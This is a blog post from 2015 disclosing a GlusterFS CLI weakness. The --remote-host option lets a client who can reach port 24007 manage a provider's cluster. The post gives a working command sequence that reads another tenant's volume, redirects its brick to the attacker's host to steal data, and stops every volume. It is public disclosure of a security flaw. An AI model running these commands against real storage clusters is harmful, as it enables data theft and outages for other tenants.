---
aliases: 
    - "/blog/one-more-reason-that-glusterfs-should-not-be-used-as-a-saas-offering"
    - "/category/glusterfs/one-more-reason-that-glusterfs-should-not-be-used-as-a-saas-offering"
    - "/category/rants-amp-raves/one-more-reason-that-glusterfs-should-not-be-used-as-a-saas-offering"
categories: [GlusterFS, "Rants & Raves"]
date: '2015-02-20T21:34:36Z'
description: >
    I filed a bug back in July 2013 asserting that a "feature" in the gluster
    CLI was a potential security bug. I've recently had that bug rejected as "Not
    a bug" so here it is.
draft: false
tags: []
slug: one-more-reason-that-glusterfs-should-not-be-used-as-a-saas-offering
title: "One more reason that GlusterFS should not be used as a SaaS offering"

---

I filed a [bug](https://bugzilla.redhat.com/show_bug.cgi?id=990284 "remote-
host security issue") back in July 2013 asserting that a "feature" in the
gluster CLI was a potential security bug. I've recently had that bug rejected
as "Not a bug" so here it is.

The CLI has an option, "--remote-host" that allows you to perform gluster CLI
operations on remote hosts. This can easily be exploited:

    
    # From host "myhost1.domain.dom", a SaaS client of provider.net
    yum -y install glusterfs-server
    systemctl start glusterd
    gluster --remote-host=server1.gluster.provider.net peer probe myhost1.domain.dom
    gluster volume info someone_elses_volume
    gluster volume replace-brick someone_elses_volume \
        server1.gluster.provider.net:/gluster/brick1 \
        myhost1.domain.dom:/data/stolen commit force
    gluster volume list | xargs -n1 gluster volume stop


Since all that is required is access to port 24007, the same port that's
needed to mount a volume, it can't be blocked and, therefore, will leave your
cluster open to abuse.

